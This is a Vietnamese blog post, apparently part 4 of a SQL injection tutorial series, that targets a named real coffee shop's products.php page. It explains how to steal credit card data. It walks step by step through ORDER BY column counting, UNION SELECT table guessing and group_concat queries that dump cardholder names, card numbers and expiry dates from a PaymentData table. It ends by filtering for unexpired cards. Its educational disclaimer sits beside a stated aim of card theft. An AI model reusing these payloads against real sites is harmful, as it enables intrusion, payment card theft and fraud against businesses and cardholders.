Tiếp phần 3, thấy có vẻ SQL căn bản ít được quan tâm, nên phần này mình xin trình bày cách get cc từ shop PHP, chứ không chiếm quyền admin như 3 part kia nữa.
Victim :
Victim :
Thấy mất chữ
Dùng ORDER BY tìm lỗi :
Hiện chữ lại rồi, tiếp tục tăng giá trị ORDER lên :
Cũng y hệt trên , chưa thấy thay đổi gì , tăng ORDER lên nữa nào :
Chú ý, ORDER tới 7 vẫn còn chữ, số 8 thì mất chữ. <-- Lỗi đây
Dùng Union select và đoán table :
Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,6,7 from Orders-- |
Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,6,7 from PaymentData-- |
Vị trí lỗi là 6 hoặc 3 , ta dùng group_concat ở vị trí 6 để lấy column :
Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,group_concat(id),7 from PaymentData-- |
Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,group_concat(idPayment),7 from PaymentDat-- |
Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,group_concat(idPayment,CardNamePayment), 7 from PaymentDat-- |
Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,group_concat(idPayment,chrCardName),7 from PaymentDat-- |
Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,group_concat(idPayment,chrCardName,chrCa rdNumber,chrExpDate),7 from PaymentData-- |
P/s : có thể những thông tin còn lại nằm ở 1 table khác, chứ không chung 1 table.
Khi view được, ta tiến hành lọc bớt những CC đã hết hạn dùng hoặc lọc theo order mới :
Trích:
http://www.hawthornecoffee.com/products.php?idDept=144 and 1=0 union select 1,2,3,4,5,group_concat(idPayment,0x7c,chrCardName, 0x7c,chrCardNumber,0x7c,chrExpDate),7 from PaymentData where chrCardNumber>0 and mid(chrExpDate,4,5)>11 and idPayment>2500-- |
Khi đã public, tức nhiên shop cc đã nát, bài này với mục đích học tập là chính. Xin đừng phê phẩm này nọ. Chỉ khuyến cáo góp ý, đóng góp cho bài viết hoàn chỉnh, chuyên sâu hơn, có bài viết cho newbie học hỏi, cùng VE phát triển. Thanks.
Chúc thành công !!!
About : megagame và bài viết __ Hacking website by sql injection p4
Cảm ơn bạn đã tham quan Blog và ghé xem bài viết này
Nếu có vấn đề thắc mắc hoặc cần thảo luận, hãy comment cho chúng tôi ở phía dưới nhé
0 nhận xét:
Đăng nhận xét